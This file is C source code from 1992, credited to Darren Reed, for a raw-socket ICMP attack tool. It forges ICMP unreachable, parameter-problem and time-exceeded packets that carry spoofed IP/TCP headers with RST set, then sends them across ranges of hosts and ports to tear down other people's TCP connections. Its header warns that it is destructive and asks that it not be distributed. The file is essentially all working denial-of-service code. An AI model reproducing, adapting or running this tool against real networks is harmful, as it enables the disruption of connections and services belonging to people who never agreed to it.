/*
 * This program is By Darren Reed (C) 1992, avalon@coombs.anu.edu.au
 * use at own risk. no money back garuntee or waranty.
 * PLEASE EXERCISE RESPONSISBILITY WHEN USING THIS PROGRAM.
 * Under *NO* circumstances makes this source publicly available or
 * distribute it in such a manner as to make it commonly available.
 * This program has enormous potential to be extremely destructive
 * and dangerous. Use with caution.
 * I take no responsibilty for any damage resulting from its use.
 */
#include <stdio.h>
#include <signal.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/protosw.h>
#include <sys/file.h>
#include <netdb.h>
#include <net/if.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/tcp.h>
#include <netinet/ip.h>
#include <netinet/tcp_timer.h>
#include <netinet/ip_icmp.h>

#define	IP_ALEN	(sizeof(struct in_addr))
#define	IP_HLEN	(sizeof(struct ip))
#define	TCP_HLEN	(sizeof(struct tcphdr))
#define	ICMP_HLEN	(sizeof(struct icmp))
#define	PACKETSIZE	(IP_HLEN + TCP_HLEN + ICMP_HLEN)

u_short	in_cksum();

extern	int	errno;

main(argc, argv)
int	argc;
char	*argv[];
{
	int	fd, len, i, donet = 0, doport = 0, reverse = 0, doproto = 0;
	int	protocol = IPPROTO_TCP, count = 1, sleeptime = 0;
	u_short	port = 0, ps = 0, pe = 0, cn = 0;
	char	buffer[1024], c;
	struct	sockaddr_in	ski;
	struct	ip	*ip;
	struct	icmp	*icp;
	struct	tcphdr	*tcp;
	struct	in_addr	target, from;
	u_long	ipn, ts = 0, te = 0, fs = 0, fe = 0;
	extern	char	*optarg;
	extern	int	optind, opterr;

	if (argc < 5)
	    {
		fprintf(stderr,
			"Useage: %s [-dor] -t host -<h|n> host [-p port]\n",
			argv[0]);
		fprintf(stderr,
			"        host : ip#[:ip#] Set range of hosts by ip#\n");
		fprintf(stderr,
			"        o    - kill all TCP based connections\n");
		fprintf(stderr,
			"        r    - swap ip#'s over and send message.\n");
		exit(1);
	    }

	while ((c = getopt(argc, argv, "PXdort:f:h:n:p:c:s:")) != -1)
		switch (c)
		{
		case 'c' :
			if (optarg)
				count = atoi(optarg);
			break;
		case 'd' :
			protocol = IPPROTO_UDP;
			break;
		case 'h' :
			if (optarg)
				get_range(optarg, &fs, &fe);
			else
				opterr = 1;
			break;
		case 'n' :
			if (optarg)
			    {
				get_range(optarg, &fs, &fe);
				donet = 1;
			    }
			else
				opterr = 1;
			break;
		case 'o' :
			doproto = 1;
			break;
		case 'p' :
			doport = 1;
			if (optarg)
				get_ports(optarg, &ps, &pe);
			if (pe == 0)
				pe = ps;
			break;
		case 'r' :
			reverse = 1;
			break;
		case 's' :
			if (optarg)
				sleeptime = atoi(optarg);
			break;
		case 't' :
			if (optarg)
				get_range(optarg, &ts, &te);
			else
				opterr = 1;
			break;
		case 'P' :
			doport = 2;
			break;
		case 'X' :
			doport = 3;
			break;
		}

	bzero(buffer, sizeof(buffer));

	icp = (struct icmp *)buffer;
	ip = (struct ip *)(icp->icmp_data);
	tcp = (struct tcphdr *)(icp->icmp_data + IP_HLEN);

	if (!te)
		ts = te;
	if (!fe)
		fs = fe;

	bzero(&ski, sizeof(ski));
	ski.sin_family = AF_INET;

	ip->ip_v = IPVERSION;
	ip->ip_hl = 5;
	ip->ip_tos = 0;
	ip->ip_id  = 0;
	ip->ip_ttl = 0xff;
	ip->ip_p   = protocol;
	ip->ip_len = IP_HLEN + TCP_HLEN;

	tcp->th_win = 0;
	tcp->th_seq = 0;
	tcp->th_ack = 0;
	tcp->th_off = 5;
	tcp->th_sum = 0;
	tcp->th_flags = TH_RST|TH_PUSH|TH_ACK;

	icp->icmp_type = ICMP_UNREACH;

	icp->icmp_code = ICMP_UNREACH_HOST;
	if (doproto)
		icp->icmp_code = ICMP_UNREACH_PROTOCOL;
	if (doport)
		icp->icmp_code = ICMP_UNREACH_PORT;
	if (donet)
		icp->icmp_code = ICMP_UNREACH_NET;
	if (doport == 2)
		icp->icmp_type = ICMP_PARAMPROB, icp->icmp_code = 0;
	if (doport == 3)
		icp->icmp_type = ICMP_TIMXCEED, icp->icmp_code = 0;

	icp->icmp_id   = 0;
	icp->icmp_seq  = 0;
	icp->icmp_cksum = 0;

	port = ps;
	target.s_addr = ts;
	from.s_addr = fs;

	printf("ICMP Packet length: %d\n", PACKETSIZE);

	for (;;)
	    {
		printf("To  : %16s\t", inet_ntoa(target));
		printf("From: %16s\t", inet_ntoa(from));
		printf("Port: %4d For. ICMP\n", port);

		ski.sin_addr.s_addr = target.s_addr;
		ski.sin_port = port;
		ipn = from.s_addr;
		bcopy(&ski.sin_addr, &ip->ip_src, IP_ALEN);
		bcopy(&ipn, &ip->ip_dst, IP_ALEN);

		ip->ip_sum = in_cksum(ip, IP_HLEN);

		tcp->th_sport = port;
		tcp->th_dport = port;
		tcp->th_sum = tcp_sum(ip, tcp);

		icp->icmp_cksum = 0;
		icp->icmp_cksum = in_cksum(icp, PACKETSIZE);

		if ((fd = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP))==-1)
		    {
			perror("socket");
			exit(-1);
		    }

		if (sendto(fd, buffer, PACKETSIZE, 0, &ski, sizeof(ski))==-1)
		    {
			perror("sendto");
			exit(-1);
		    }

		if (reverse)
		    {
			bcopy(&ski.sin_addr, &ip->ip_dst, IP_ALEN);
			bcopy(&ipn, &ip->ip_src, IP_ALEN);
			bcopy(&ipn, &ski.sin_addr, IP_ALEN);

			printf("To  : %16s\t", inet_ntoa(target));
			printf("From: %16s\t", inet_ntoa(from));
			printf("Port: %4d Rev. ICMP\n", port);

			if (sendto(fd, buffer, PACKETSIZE, 0,
				   &ski, sizeof(ski))==-1)
			    {
				perror("sendto");
				exit(-1);
			    }
		    }
		close(fd);

		if (sleeptime)
			sleep(sleeptime);
		cn++;
		if (cn < count)
			continue;
		cn = 0;
		port++;
		if (port < pe)
			continue;
		port = ps;
		from.s_addr++;
		if (from.s_addr > fe)
		    {
			from.s_addr = fs;
			target.s_addr++;
			if (target.s_addr > te)
				break;
		    }

	    }
	printf ("\n");
}


u_short	tcp_sum(pip, tcpb)
struct	ip	*pip;
short	*tcpb;
{
	u_short	*sptr, len;
	register	u_long	sum = 0;
	int	i;

	sptr = (u_short *)&(pip->ip_src);

	for (i = 0; i < 2; i++)
		sum += *sptr++;

	sptr = (u_short *)tcpb;

	len = pip->ip_len - IP_HLEN;
	sum += IPPROTO_TCP + len;

	if (len % 2) {
		((char *)tcpb)[len] = 0;	/* pad */
		len += 1;
	}
	len >>= 1;	/* convert to length in shorts */

	for (i = 0; i < len; i++)
		sum += *sptr++;

	sum = (sum >> 16) + (sum & 0xffff);
	sum += (sum >> 16);

	return	(short)(~sum & 0xffff);
}

in_cksum(addr, len)
u_short *addr;
int len;
{
	register int nleft = len;
	register u_short *w = addr;
	register u_short answer;
	register int sum = 0;

	/*
	 *  Our algorithm is simple, using a 32 bit accumulator (sum),
	 *  we add sequential 16 bit words to it, and at the end, fold
	 *  back all the carry bits from the top 16 bits into the lower
	 *  16 bits.
	 */
	while (nleft > 1)  {
		sum += *w++;
		nleft -= 2;
	}

	/* mop up an odd byte, if necessary */
	if (nleft == 1)
		sum += *(u_char *)w;

	/*
	 * add back carry outs from top 16 bits to low 16 bits
	 */
	sum = (sum >> 16) + (sum & 0xffff);	/* add hi 16 to low 16 */
	sum += (sum >> 16);			/* add carry */
	answer = ~sum;				/* truncate to 16 bits */
	return (answer);
}

u_long	get_addr(name)
char	*name;
{
	struct	hostent	*hp;
	struct	in_addr	*ip;

	if (isdigit(*name))
		return (inet_addr(name));

	hp = gethostbyname(name);
	if (!hp)
		return -1;
	ip = (struct in_addr *)(hp->h_addr_list[0]);

	return (ip->s_addr);
}

int	get_range(name, is, ie)
char	*name;
u_long	*is, *ie;
{
	char	*to = name;

	if (to = (char *)index(name, ':'))
	    {
		*to++ = '\0';
		*ie = get_addr(to);
	    }
	*is = get_addr(name);
	if (!*ie)
		*ie = *is;
	if (*ie == -1 || *is == -1)
	    {
		printf("name %s to %s\n",name,to);
		exit(-1);
	   }
}

get_ports(name, ps, pe)
char	*name;
u_short	*ps, *pe;
{
	char	*to;

	if (to = (char *)index(name, ':'))
	    {
		*to++ = '\0';
		*pe = htons(atoi(to));
	    }
	*ps = htons(atoi(name));
}

#































